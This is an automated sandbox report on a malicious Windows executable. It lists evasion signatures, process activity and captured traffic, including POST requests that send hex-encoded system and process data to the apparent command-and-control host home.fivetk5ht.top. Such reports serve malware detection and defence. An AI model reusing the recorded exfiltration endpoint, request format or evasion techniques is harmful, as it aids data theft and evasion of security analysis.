Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WP6s7cCLzr.exe

Overview

General Information

Sample name:WP6s7cCLzr.exe
renamed because original name is a hash value
Original sample name:dd8df388d297c668e3cccbd9132ee6c1.exe
Analysis ID:1578942
MD5:dd8df388d297c668e3cccbd9132ee6c1
SHA1:648171cc15bcf5c037aff15f09fdaf4ab07c23c3
SHA256:1f5ac588733bf56f94fe424076a6c91afe805edac18fca6a5c8e2b86e9f9d87b
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • WP6s7cCLzr.exe (PID: 3784 cmdline: "C:\Users\user\Desktop\WP6s7cCLzr.exe" MD5: DD8DF388D297C668E3CCCBD9132EE6C1)
    • WerFault.exe (PID: 2660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 1140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: WP6s7cCLzr.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: WP6s7cCLzr.exeReversingLabs: Detection: 71%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: WP6s7cCLzr.exeJoe Sandbox ML: detected
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_fc164f73-c
Source: WP6s7cCLzr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 515753Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 31 38 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 515753Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 31 38 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 515753Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 31 38 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknownHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 515753Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 31 38 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: WP6s7cCLzr.exe, 00000000.00000002.1892125038.0000000001F32000.00000004.00000020.00020000.00000000.sdmp, WP6s7cCLzr.exe, 00000000.00000002.1892125038.0000000001F5B000.00000004.00000020.00020000.00000000.sdmp, WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: WP6s7cCLzr.exe, 00000000.00000002.1892125038.0000000001F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
Source: WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
PE file contains section with special chars
Source: WP6s7cCLzr.exeStatic PE information: section name:
Source: WP6s7cCLzr.exeStatic PE information: section name: .idata
Source: WP6s7cCLzr.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 1140
Source: WP6s7cCLzr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: WP6s7cCLzr.exeStatic PE information: Section: ctknaohd ZLIB complexity 0.9940421481092437
Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3784
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\db3cbb7c-6ba7-49c5-9250-5470caf73ebbJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: WP6s7cCLzr.exeReversingLabs: Detection: 71%
Source: WP6s7cCLzr.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\WP6s7cCLzr.exe "C:\Users\user\Desktop\WP6s7cCLzr.exe"
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 1140
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSection loaded: wldp.dllJump to behavior
